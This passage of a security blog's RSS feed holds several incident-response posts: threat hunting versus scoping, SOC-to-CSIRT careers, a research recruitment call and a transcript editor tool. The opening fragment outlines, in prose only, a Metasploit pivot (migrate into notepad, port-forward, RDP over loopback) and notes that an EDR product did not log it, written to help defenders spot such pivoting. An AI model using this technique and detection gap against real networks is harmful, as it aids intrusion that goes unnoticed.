&lt;/h2&gt;&lt;p&gt;In the sandbox I was playing in, CrowdStrike &lt;strong&gt;did not log&lt;/strong&gt; these loopback RDP connections at all. This means if you’re only leaning on whatever showed up in the console for &amp;ldquo;network&amp;rdquo;, you might miss the story entirely. I had to go deeper (think &lt;strong&gt;RTR&lt;/strong&gt; / live response style work) to actually correlate the socket to the process and realise what was going on.&lt;/p&gt;
&lt;p&gt;It &lt;em&gt;did&lt;/em&gt; catch the process migration, which honestly tracks; EDR tends to be pretty vocal about &amp;ldquo;hey this thing jumped into notepad&amp;rdquo; compared to every weird edge case around localhost RDP.&lt;/p&gt;
&lt;p&gt;The Metasploit sequence below shows how this can be set up on the attacker side: spawn notepad, migrate, &lt;code&gt;portfwd&lt;/code&gt;, then RDP to the local forward:&lt;/p&gt;
&lt;p&gt;&lt;img src=&#34;https://thisinsecureworld.com/p/pivoting-rdp-and-why-notepad-talking-to-3389-is-suss/meterpreter-portfwd-rdp.png&#34;
	width=&#34;759&#34;
	height=&#34;614&#34;
	srcset=&#34;https://thisinsecureworld.com/p/pivoting-rdp-and-why-notepad-talking-to-3389-is-suss/meterpreter-portfwd-rdp_hu_6fb6da0c42288b2d.png 480w, https://thisinsecureworld.com/p/pivoting-rdp-and-why-notepad-talking-to-3389-is-suss/meterpreter-portfwd-rdp_hu_a35a31b68735bce8.png 1024w&#34;
	loading=&#34;lazy&#34;
	
		alt=&#34;Metasploit migrate and portfwd then RDP client&#34;
	
	
		class=&#34;gallery-image&#34; 
		data-flex-grow=&#34;123&#34;
		data-flex-basis=&#34;296px&#34;
	
&gt;&lt;/p&gt;
&lt;h2 id=&#34;wrapping-up&#34;&gt;Wrapping up
&lt;/h2&gt;&lt;p&gt;Pivoting is one of those skills that’s easy to learn in a lab and painful to spot under pressure, because the IOCs stop being &amp;ldquo;bad IP&amp;rdquo; and start being &amp;ldquo;weird relationship between two things that are both allowed in isolation&amp;rdquo;. If you’re in an IR and the network looks quiet, sketch the hops anyway. The boring old &lt;code&gt;netstat&lt;/code&gt; / PID story still punches above its weight.&lt;/p&gt;
</description>
        </item>
        <item>
        <title>A Local Transcript Editor for CGT Research</title>
        <link>https://thisinsecureworld.com/p/a-local-transcript-editor-for-cgt-research/</link>
        <pubDate>Sun, 26 Apr 2026 00:00:00 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/p/a-local-transcript-editor-for-cgt-research/</guid>
        <description>&lt;h1 id=&#34;the-problem&#34;&gt;The Problem
&lt;/h1&gt;&lt;p&gt;I&amp;rsquo;m doing constructivist grounded theory (CGT) research, which means I&amp;rsquo;m spending a lot of time with interview transcripts. A &lt;em&gt;lot&lt;/em&gt; of time. CGT requires iterative, line-by-line analysis of transcripts, and the quality of those transcripts directly impacts the quality of the research. Misheard words, incorrect speaker attribution, missing emotional context - these aren&amp;rsquo;t minor inconveniences, they&amp;rsquo;re threats to analytical integrity.&lt;/p&gt;
&lt;p&gt;Auto-generated transcripts are a starting point, but they&amp;rsquo;re rarely good enough for serious analysis. The AI gets speakers confused. It misses sarcasm and tone. It doesn&amp;rsquo;t capture pauses or laughter that signal meaning. And for CGT work, where I&amp;rsquo;m looking for patterns in how participants use language and co-construct meaning through dialogue, these details matter.&lt;/p&gt;
&lt;p&gt;I needed a way to review and refine transcripts that didn&amp;rsquo;t involve bouncing between media players, text editors, and spreadsheets. Something purpose-built for the actual work of preparing transcripts for coding.&lt;/p&gt;
&lt;h1 id=&#34;the-tool&#34;&gt;The Tool
&lt;/h1&gt;&lt;p&gt;I built &lt;a class=&#34;link&#34; href=&#34;https://thisinsecureworld.com/blobs/transcript-editor.html&#34; &gt;a transcript editor&lt;/a&gt; that handles the specific needs of transcript refinement for qualitative research. It&amp;rsquo;s a single-page web app that runs entirely in your browser - no file uploads, no servers, everything stays local on your machine.&lt;/p&gt;
&lt;h2 id=&#34;what-it-does&#34;&gt;What It Does
&lt;/h2&gt;&lt;p&gt;&lt;strong&gt;Speaker Management&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Click any speaker label to reassign it&lt;/li&gt;
&lt;li&gt;Edit speaker names inline&lt;/li&gt;
&lt;li&gt;Visual color coding to track who&amp;rsquo;s speaking&lt;/li&gt;
&lt;li&gt;Handles multi-party conversations cleanly&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Transcript Editing&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Edit text directly inline, no forms or popups&lt;/li&gt;
&lt;li&gt;Auto-resizing text fields that flow naturally&lt;/li&gt;
&lt;li&gt;Preserves formatting and paragraph structure&lt;/li&gt;
&lt;li&gt;Fast keyboard-driven workflow&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Contextual Annotations&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Add notes for paralinguistic cues: [laughter], [long pause], [sarcastic tone]&lt;/li&gt;
&lt;li&gt;Attach context that the audio captures but text loses&lt;/li&gt;
&lt;li&gt;Notes stay attached to specific segments&lt;/li&gt;
&lt;li&gt;Visual indicators show which segments have annotations&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Media Synchronization&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Drop in your audio or video file alongside the transcript&lt;/li&gt;
&lt;li&gt;Click any timestamp to jump to that point in the recording&lt;/li&gt;
&lt;li&gt;Verify ambiguous sections without leaving the editor&lt;/li&gt;
&lt;li&gt;Keyboard shortcuts for play/pause/skip&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Format Flexibility&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Detects common transcript formats automatically&lt;/li&gt;
&lt;li&gt;Handles SRT, VTT, JSON, plain text with timestamps&lt;/li&gt;
&lt;li&gt;Export in multiple formats for different analysis tools&lt;/li&gt;
&lt;li&gt;Works with whatever your transcription service outputs&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id=&#34;why-this-approach-works-for-cgt&#34;&gt;Why This Approach Works for CGT
&lt;/h2&gt;&lt;p&gt;CGT transcript analysis is iterative. You don&amp;rsquo;t just read through once - you return to transcripts repeatedly as your coding evolves. You compare segments across interviews. You verify that emerging concepts are grounded in participants&amp;rsquo; actual words.&lt;/p&gt;
&lt;p&gt;This means transcript quality compounds. An error you miss in the initial review will propagate through your coding. A speaker misattribution early on can obscure important patterns in how dialogue unfolds. Missing emotional context can lead to misinterpreting emphasis or meaning.&lt;/p&gt;
&lt;p&gt;Traditional transcript review workflows are fragmented:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Play audio in one app&lt;/li&gt;
&lt;li&gt;Edit text in another&lt;/li&gt;
&lt;li&gt;Track speakers in a spreadsheet&lt;/li&gt;
&lt;li&gt;Note context in yet another document&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;That fragmentation creates friction. Friction means corners get cut. Corners cut on transcript quality mean compromised analysis.&lt;/p&gt;
&lt;p&gt;Having everything in one place - media playback, speaker assignment, text editing, contextual notes - removes that friction. The transcript review process becomes fast enough that you actually &lt;em&gt;do&lt;/em&gt; it properly rather than telling yourself &amp;ldquo;good enough&amp;rdquo; and moving on.&lt;/p&gt;
&lt;h2 id=&#34;the-privacy-angle&#34;&gt;The Privacy Angle
&lt;/h2&gt;&lt;p&gt;For research work, data privacy isn&amp;rsquo;t optional. Interview transcripts often contain sensitive information. Participants agreed to share their experiences with the researcher, not with random cloud services.&lt;/p&gt;
&lt;p&gt;Everything in this tool happens in your browser. Your transcript file never leaves your machine. There&amp;rsquo;s no upload. There&amp;rsquo;s no account. There&amp;rsquo;s no third-party processing your data. You can verify this by reading the source code - it&amp;rsquo;s all right there in a single HTML file.&lt;/p&gt;
&lt;p&gt;This matters for research ethics and for institutional review board requirements. You can use this tool on sensitive transcripts without creating new privacy concerns.&lt;/p&gt;
&lt;h2 id=&#34;the-workflow&#34;&gt;The Workflow
&lt;/h2&gt;&lt;p&gt;Here&amp;rsquo;s how this fits into CGT transcript preparation:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Generate initial transcript&lt;/strong&gt;: I use &lt;a class=&#34;link&#34; href=&#34;https://github.com/rishikanthc/Scriberr&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Scriberr&lt;/a&gt; hosted locally with the Whisper 3 Large model, but any transcription service works (Otter, Rev, etc.)&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Load into editor&lt;/strong&gt;: Drop the transcript file (and optionally the audio/video) into the editor&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Review and refine&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;Listen to sections while reading along&lt;/li&gt;
&lt;li&gt;Correct misheard words and phrases&lt;/li&gt;
&lt;li&gt;Fix speaker attributions&lt;/li&gt;
&lt;li&gt;Add paralinguistic annotations where meaning depends on tone&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Export clean transcript&lt;/strong&gt;: Save the refined version for import into your coding software (NVivo, Atlas.ti, etc.)&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The refined transcript becomes your source material for coding. Time invested here improves every subsequent stage of analysis.&lt;/p&gt;
&lt;h2 id=&#34;how-long-this-takes&#34;&gt;How Long This Takes
&lt;/h2&gt;&lt;p&gt;For a 60-minute interview transcript, the review process typically takes me 45-60 minutes with this tool. That&amp;rsquo;s faster than my previous workflow (audio player + text editor + notebook), and the output quality is better because I&amp;rsquo;m not skipping things due to workflow friction.&lt;/p&gt;
&lt;p&gt;The time investment is worth it. I&amp;rsquo;m going to spend dozens of hours analyzing each transcript. An extra hour up front to ensure accuracy compounds across all that subsequent analysis.&lt;/p&gt;
&lt;h1 id=&#34;if-you-want-it&#34;&gt;If You Want It
&lt;/h1&gt;&lt;p&gt;The tool is &lt;a class=&#34;link&#34; href=&#34;https://thisinsecureworld.com/non-blog/transcript-editor.html&#34; &gt;here&lt;/a&gt;. It&amp;rsquo;s a single HTML file - download it, open it in a browser, and you&amp;rsquo;re ready to work. No installation, no configuration, no dependencies.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re doing qualitative research and working with interview transcripts, this might save you some time. If you need modifications for your specific workflow, the source is right there in the HTML file.&lt;/p&gt;
&lt;h1 id=&#34;time-well-spent&#34;&gt;Time Well Spent
&lt;/h1&gt;&lt;p&gt;Building this tool took about 45 minutes. It&amp;rsquo;s going to save me hours over the next few months as I work through interview transcripts for my research. More importantly, it&amp;rsquo;s going to improve the quality of that work by making the transcript refinement process fast enough that I actually do it thoroughly rather than cutting corners.&lt;/p&gt;
&lt;p&gt;Sometimes the best tool for your workflow is the one you build specifically for your workflow.&lt;/p&gt;
</description>
        </item>
        <item>
        <title>Threat Hunting vs Incident Scoping: Words Actually Mean Things</title>
        <link>https://thisinsecureworld.com/p/threat-hunting-vs-incident-scoping-words-actually-mean-things/</link>
        <pubDate>Sat, 25 Apr 2026 00:00:00 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/p/threat-hunting-vs-incident-scoping-words-actually-mean-things/</guid>
        <description>&lt;h1 id=&#34;the-problem&#34;&gt;The Problem
&lt;/h1&gt;&lt;p&gt;I&amp;rsquo;ve got a recurring frustration with how &amp;ldquo;threat hunting&amp;rdquo; gets thrown around in incident response circles. I&amp;rsquo;ll be deep in an active incident where we&amp;rsquo;ve detected a compromise, we&amp;rsquo;re investigating affected systems, we&amp;rsquo;re scoping out how far the attacker got, and someone will inevitably say &amp;ldquo;we need to do some threat hunting to find other compromised hosts.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;No. That&amp;rsquo;s not threat hunting. That&amp;rsquo;s using sweeping to scope the incident. That&amp;rsquo;s just&amp;hellip; incident response.&lt;/p&gt;
&lt;p&gt;This isn&amp;rsquo;t pedantry for the sake of it. Words mean things, especially in our field where clear communication during an incident can be the difference between containment and catastrophe. So let&amp;rsquo;s sort this out.&lt;/p&gt;
&lt;h2 id=&#34;what-threat-hunting-actually-is&#34;&gt;What Threat Hunting Actually Is
&lt;/h2&gt;&lt;p&gt;According to every major security vendor and framework out there, threat hunting is:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The proactive search for NEW, undetected threats that have evaded your existing security controls.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Let&amp;rsquo;s break that down:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Proactive&lt;/strong&gt;: You&amp;rsquo;re not responding to an alert or incident. You&amp;rsquo;re going looking.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Undetected&lt;/strong&gt;: Whatever you&amp;rsquo;re hunting for hasn&amp;rsquo;t triggered your detection systems.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;New&lt;/strong&gt;: You don&amp;rsquo;t already know about this compromise.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;CrowdStrike defines it as &amp;ldquo;the practice of proactively searching for cyber threats that are lurking undetected in a network.&amp;rdquo; Splunk calls it &amp;ldquo;any manual or machine-assisted process for finding security incidents that your automated detection systems missed.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;The key word across all these definitions? &lt;strong&gt;Undetected.&lt;/strong&gt;&lt;/p&gt;
&lt;h2 id=&#34;what-incident-scoping-actually-is&#34;&gt;What Incident Scoping Actually Is
&lt;/h2&gt;&lt;p&gt;When you&amp;rsquo;re already in an incident, when something HAS been detected, when you KNOW you&amp;rsquo;re compromised, when you&amp;rsquo;re working an active case, the process of finding additional affected systems is called &lt;strong&gt;incident scoping&lt;/strong&gt;, sometimes colloquially referred to as sweeping.&lt;/p&gt;
&lt;p&gt;SentinelOne puts it beautifully: &amp;ldquo;The purpose of DF/IR methodologies is to determine what happened after a data breach has already come to light.&amp;rdquo;&lt;/p&gt;
&lt;p&gt;That&amp;rsquo;s the distinction. Threat hunting happens BEFORE you know there&amp;rsquo;s a problem. Incident response (including scoping) happens AFTER you&amp;rsquo;ve detected one.&lt;/p&gt;
&lt;h2 id=&#34;why-this-matters&#34;&gt;Why This Matters
&lt;/h2&gt;&lt;p&gt;Beyond just getting the terminology right, conflating these concepts causes real problems:&lt;/p&gt;
&lt;h3 id=&#34;1-resource-allocation&#34;&gt;1. &lt;strong&gt;Resource Allocation&lt;/strong&gt;
&lt;/h3&gt;&lt;p&gt;Threat hunting and incident response require different resources, skills, and time commitments. If you&amp;rsquo;re in an active incident and someone says &amp;ldquo;let&amp;rsquo;s threat hunt,&amp;rdquo; you might spin up your threat hunting team when what you actually need is your incident response team working overtime.&lt;/p&gt;
&lt;h3 id=&#34;2-expectations-and-urgency&#34;&gt;2. &lt;strong&gt;Expectations and Urgency&lt;/strong&gt;
&lt;/h3&gt;&lt;p&gt;Threat hunting is typically a deliberate, hypothesis-driven process. You&amp;rsquo;re exploring, investigating leads, potentially spending days or weeks on a hunt. Incident scoping during an active response needs to be fast and focused - you&amp;rsquo;re not exploring, you&amp;rsquo;re containing.&lt;/p&gt;
&lt;h3 id=&#34;3-metrics-and-reporting&#34;&gt;3. &lt;strong&gt;Metrics and Reporting&lt;/strong&gt;
&lt;/h3&gt;&lt;p&gt;If you&amp;rsquo;re reporting &amp;ldquo;threat hunting activities&amp;rdquo; but what you&amp;rsquo;re actually doing is incident response, your metrics are garbage. Your threat hunting program looks busier than it is, and your incident response workload is being undercounted.&lt;/p&gt;
&lt;h3 id=&#34;4-communication-clarity&#34;&gt;4. &lt;strong&gt;Communication Clarity&lt;/strong&gt;
&lt;/h3&gt;&lt;p&gt;When you&amp;rsquo;re briefing stakeholders on an incident, telling them you&amp;rsquo;re &amp;ldquo;threat hunting&amp;rdquo; suggests you&amp;rsquo;re not sure if there&amp;rsquo;s a problem yet. That&amp;rsquo;s very different from &amp;ldquo;we&amp;rsquo;ve confirmed a breach and are scoping the impact.&amp;rdquo;&lt;/p&gt;
&lt;h3 id=&#34;5-burden-of-proof&#34;&gt;5. &lt;strong&gt;Burden of Proof&lt;/strong&gt;
&lt;/h3&gt;&lt;p&gt;Threat hunting teams are generally required to triage their findings before reporting them to the SOC for a security response. Sweeping the environment for indicators of compromise, as a part of scoping, generally doesn&amp;rsquo;t have this burden. If the indicator exists on a machine, that machine becomes part of the incident response scope, no additional analysis required.&lt;/p&gt;
&lt;h2 id=&#34;the-practical-difference&#34;&gt;The Practical Difference
&lt;/h2&gt;&lt;p&gt;Here&amp;rsquo;s how it plays out in the real world:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Threat Hunting Scenario:&lt;/strong&gt;
Your EDR hasn&amp;rsquo;t alerted. Your SIEM is quiet. But you&amp;rsquo;ve read about a new technique where attackers are abusing legitimate admin tools in creative ways. You build a hypothesis: &amp;ldquo;What if someone is using PSExec in an unusual pattern to move laterally?&amp;rdquo; You query your logs, looking for anomalies. You find evidence of compromise that bypassed your detections. You&amp;rsquo;ve just completed a successful hunt. &lt;strong&gt;This is threat hunting.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Incident Scoping Scenario:&lt;/strong&gt;
Your EDR alerts: Dropper execution detected on WORKSTATION-042. You investigate and confirm the dropper pulls down undetected malware, and the workstation was compromised. Now you need to find everywhere that malware was dropped, every system it touched, every file it accessed. You&amp;rsquo;re pivoting on IOCs, searching logs, looking for related activity. &lt;strong&gt;This is incident scoping.&lt;/strong&gt; It&amp;rsquo;s part of incident response. It is NOT threat hunting.&lt;/p&gt;
&lt;h2 id=&#34;industry-consensus&#34;&gt;Industry Consensus
&lt;/h2&gt;&lt;p&gt;This isn&amp;rsquo;t just my opinion. Every major security vendor and framework agrees threat hunting is looking for:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;CrowdStrike&lt;/strong&gt;: Threats &amp;ldquo;lurking undetected&amp;rdquo;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Splunk&lt;/strong&gt;: Incidents &amp;ldquo;your automated detection systems missed&amp;rdquo;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Microsoft Sentinel&lt;/strong&gt;: &amp;ldquo;Anomalies that aren&amp;rsquo;t detected by your security apps&amp;rdquo;&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Fortinet&lt;/strong&gt;: Explicitly contrasts proactive threat hunting with reactive incident response&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;SentinelOne&lt;/strong&gt;: Distinguishes hunting from DF/IR which addresses breaches &amp;ldquo;after they come to light&amp;rdquo;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The consensus is clear and consistent. Threat hunting is for finding NEW incidents. Incident response (including scoping/sweeping) is for handling EXISTING incidents.&lt;/p&gt;
&lt;h2 id=&#34;conclusion&#34;&gt;Conclusion
&lt;/h2&gt;&lt;p&gt;If it&amp;rsquo;s already detected and you&amp;rsquo;re responding to it, you&amp;rsquo;re not hunting. You&amp;rsquo;re responding.&lt;/p&gt;
&lt;p&gt;Threat hunting is for finding NEW compromises that evaded your defenses. Incident scoping is for determining the extent of KNOWN compromises. They use similar techniques, but they&amp;rsquo;re fundamentally different activities with different goals, different urgency levels, and different success criteria.&lt;/p&gt;
&lt;p&gt;Words mean things. Use the right ones.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;strong&gt;Sources:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a class=&#34;link&#34; href=&#34;https://www.crowdstrike.com/cybersecurity-101/threat-hunting/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;CrowdStrike - What is Threat Hunting?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class=&#34;link&#34; href=&#34;https://www.splunk.com/en_us/blog/learn/threat-hunting.html&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Splunk - What is Threat Hunting?&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class=&#34;link&#34; href=&#34;https://www.sentinelone.com/cybersecurity-101/threat-hunting/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;SentinelOne - Threat Hunting&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class=&#34;link&#34; href=&#34;https://learn.microsoft.com/en-us/azure/sentinel/hunting&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Microsoft Sentinel - Threat Hunting&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a class=&#34;link&#34; href=&#34;https://www.fortinet.com/resources/cyberglossary/threat-hunting&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;Fortinet - Threat Hunting&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
</description>
        </item>
        <item>
        <title>Research Recruitment</title>
        <link>https://thisinsecureworld.com/research-recruitment/</link>
        <pubDate>Mon, 20 Apr 2026 00:00:00 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/research-recruitment/</guid>
        <description>&lt;p&gt;Hey friends!&lt;/p&gt;
&lt;p&gt;I’m conducting doctoral research at Te Herenga Waka - Victoria University of Wellington investigating the methodologies employed by experienced practitioners in cyber intrusion investigation and response.&lt;/p&gt;
&lt;p&gt;Despite the critical importance of incident response to organisational security, our field currently lacks a communicable, tactical framework for practice. Expertise remains largely tacit, transferred informally as &amp;ldquo;tribal knowledge&amp;rdquo; rather than through structured, teachable methodology. My research seeks to address this gap by capturing and codifying the processes used by experienced practitioners.&lt;/p&gt;
&lt;p&gt;I am seeking participants who meet the following criteria:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Participation in a minimum of five intrusion investigation and response engagements, OR&lt;/li&gt;
&lt;li&gt;Technical leadership of a minimum of three such engagements&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Note that for the purposes of this research, an intrusion is the interactive access to more than one computing system by an attacker, where the access to subsequent systems is dependent on the compromise of previous systems. For example, two different systems being compromised by the same phishing campaign would not meet this criteria, but the compromise of one system leading to lateral movement to a second system would.&lt;/p&gt;
&lt;p&gt;Participation involves a 90-minute recorded (video or audio, your choice!) interview comprising two components: questions regarding general experience and professional practice (~30 minutes), followed by a (hopefully fun) tabletop scenario exercise designed to elicit investigative methodology without requiring disclosure of specific client engagements (~60 minutes).&lt;/p&gt;
&lt;p&gt;All data will be de-identified and treated confidentially. If you’re interested, you can get a copy of the complete scenario documentation for use in your own professional development activities, along with copies of published research outputs.&lt;/p&gt;
&lt;p&gt;Of course, if you participate now, and in the future decide you want to withdraw your consent and provided data, we support this. Please see the Participant Information Sheet for details on the withdrawal process.&lt;/p&gt;
&lt;p&gt;Further details are available in the &lt;a class=&#34;link&#34; href=&#34;https://thisinsecureworld.com/blobs/ParticipantInformationSheetandConsentForm.pdf&#34; &gt;Participant Information Sheet and Consent Form&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To schedule an interview: &lt;a class=&#34;link&#34; href=&#34;https://scheduler.zoom.us/pearsoluke1/rq1-booking-page&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;https://scheduler.zoom.us/pearsoluke1/rq1-booking-page&lt;/a&gt;&lt;br&gt;
Whether or not it’s for you, I’d be eternally grateful if you would share this invitation with colleagues who may be interested and meet the eligibility criteria.&lt;/p&gt;
&lt;p&gt;This research has been approved by the Te Herenga Waka—Victoria University of Wellington Human Ethics Committee 2026/HE040062.&lt;/p&gt;
</description>
        </item>
        <item>
        <title>Transitioning from SOC to CSIRT</title>
        <link>https://thisinsecureworld.com/p/transitioning-from-soc-to-csirt/</link>
        <pubDate>Mon, 17 Feb 2025 00:00:00 +0000</pubDate>
        
        <guid>https://thisinsecureworld.com/p/transitioning-from-soc-to-csirt/</guid>
        <description>&lt;h1 id=&#34;musings-on-soc-and-csirt-and-upward-trajectories&#34;&gt;Musings on SOC and CSIRT and “Upward Trajectories”
&lt;/h1&gt;&lt;p&gt;I’ve been working with a company recently to help them hire a new Senior CSIRT Incident Responder. There have been some changes to their team recently which means they can’t afford to take someone more junior and train them up into the position (which is this company’s preferred method of building seniors, and I love), they need someone who can hit the ground running and lead things &lt;em&gt;today&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;We’ve had a lot of people who are SOC analysts, and have been SOC analysts for at least four years, applying for the position. I love this, SOC staff are at the coal-face of incident response, dealing with everything from imaginary mouse movements to the very first detection finding an APT in your environment. It’s a very hard job, and honestly one that I think is a security specialism in its own right, but I digress.&lt;/p&gt;
&lt;p&gt;A lot of people seem to think that SOC is an entry level job, and that if you put in enough time and get enough experience, you’ll naturally learn the skills you need to become a solid incident responder. And in certain cases this is true, but I think that the way SOCs are made up today, most of the time, you’re not going to get the well rounded diet of activities growing incident responder’s need.&lt;/p&gt;
&lt;p&gt;Incident responders (when they’re doing incident response and aren’t stuck in the prepare loop from hell) are specialists at system forensics as well as tracking an attacker as. they move through an organisation. SOC work can certainly prepare you for the former here, as triaging alerts will naturally give you a really good understanding of system artifacts and where to look to prove hypothesis (persistence? Better check those run keys!).&lt;/p&gt;
&lt;p&gt;I don’t like “tell me about a time when” based interviews. The problem with these interviews, is they have the benefit of hindsight, and the answer I tend to get from candidates is them telling me an idealised version of what went down, where the mistakes they made are covered up by what they learned at the time, making the candidate out to be better than they might be in the heat of the moment. Incident response is all about how you handle the unknown, the scary, and relying on your whit, which is why I will &lt;em&gt;always&lt;/em&gt; incorporate &lt;a class=&#34;link&#34; href=&#34;https://www.salesforce.com/blog/hiring-csirt/&#34;  target=&#34;_blank&#34; rel=&#34;noopener&#34;
    &gt;scenarios&lt;/a&gt; at some point in the interview chain.&lt;/p&gt;
&lt;p&gt;The challenge I’ve seen in interviewees recently is that they struggle to pivot their thinking from single host analysis to assessing the business as a whole. In an interview scenario, I might give them an IP address that the malware talks to, or a username that falls out of a command the attacker executed, and I’m ready and waiting for “neat! What other systems have connected to that IP address?!” or “bloody choice, what other systems has that user logged in to? All of them? By design? Fantastic, let me tell you how I’d separate the good from the bad!”. These conversations are &lt;em&gt;awesome&lt;/em&gt; give the candidate a chance to really show off their stuff, and, most importantly, keep the interview interesting for me!&lt;/p&gt;
&lt;p&gt;What tends to happen instead is that this critical information is glossed over, and the candidate instead tries to chase the things they know how to investigate. Part of this is absolutely to show off their knowledge, this is an interview, after all, and rattling off the various Powershell logs and their locations on disk is totally impressive. But I think another part, a bigger and scarier part, is that pivoting based on IOCs outside of the host in question just isn’t considered as part of their investigation.&lt;/p&gt;
&lt;p&gt;I’ve looked around, and there’s not a lot of training on this. SANS will give you weeks and weeks of content on the difference between a prefetch and MFT file, how you can parse them, how you can feed them in to the massive list of findings you’ll generate for that host. SO will youtube, and home labbing, a zillion blog posts out there, etc.&lt;/p&gt;
&lt;p&gt;What I struggle to find is training on how to lead an organisation-level compromise, filled with lateral movement, multiple compromised hosts, sleeper compromise that will only activate a month after you kick the attacker out and lead to recompromise of your environment, etc. Honestly, this baffles me. This is the stuff that actually happens in major incidents - the APT compromises, the ransomware deployments, the breaches that make headlines. Yet the training focuses overwhelmingly on single-host forensics while glossing over the orchestration and scoping skills you need when five hosts turn into fifty.&lt;/p&gt;
&lt;p&gt;But that’s for people who want to become incident responders. That’s what I would consider a critical skillset to develop. Is that was every SOC analyst wants? Is CSIRT the natural progression of SOC? I personally don’t think so. I think SOC is a specialty that stands on its own. SOC don’t get to take their time on a single host - SOC need to develop specialised skills to triage systems into “needs more work” or “this is a nothingburger” absurdly quickly so they can get through the deluge of alerts that make up their day. And I take my hats off to these people - I can’t do that. I’m not fast enough, and I dive down rabbit holes way too easy.&lt;/p&gt;
&lt;p&gt;So for you SOC analysts who want to become incident responders, do it! You’ve got an amazing foundation of knowledge in your current role, and with effort, you can build upon that to learn how to incident respond well. Please, though, don’t think your 5 years in SOC with little extra effort has prepared you to step straight in to an incident responder role, because it probably hasn’t. You’re going to need to put in the effort.&lt;/p&gt;
&lt;p&gt;And to those of you in the SOC who have made the coal-face your specialisation, who own it and truly excel at what you do, I salute you, and I look forward to begging you for help in my next incident response engagement, because you know I’m going to need you.&lt;/p&gt;
</description>
        </item>
        <item>
        <title>OODA Loop for Alert Review</title>
        <link>https://thisinsecureworld.com/p/ooda-loop-for-alert-review/</link>
        <pubDate>Sat, 16 Nov 2024 00:36:31 +1300</pubDate>
        
        <guid>https://thisinsecureworld.com/p/ooda-loop-for-alert-review/</guid>
        <description>&lt;h1 id=&#34;introduction&#34;&gt;Introduction
&lt;/h1&gt;&lt;p&gt;Alert reviews are hard. Looking through alerts, not getting sucked in to the gory details, and keeping in mind the &lt;em&gt;why&lt;/em&gt; of the work you’re doing is harder to keep up with, especially for newer staff. This issue exacerbated by experienced staff developing a solid “gut feel” for reviewing alerts / investigative leads, and leaving themselves unable to explain, in a repeatable fashion, &lt;em&gt;how&lt;/em&gt; they do what they do. An approach I’ve had some success with in giving staff a thought process to keep them on-track is the OODA Loop.&lt;/p&gt;
&lt;p&gt;The OODA Loop was created by Colonel John Boyd of the US Air Force, back in 1976. Given the dearth of military terminology in the Cyber Space, I thought this was worth investigation /s. Cyber isn’t the first space to pick up OODA loops outside of a military context, law enforcement, healthcare, legal and even political campaigners have implemented the OODA loops to great effect. So what is the OODA loop?&lt;/p&gt;
&lt;h1 id=&#34;ooda&#34;&gt;OODA
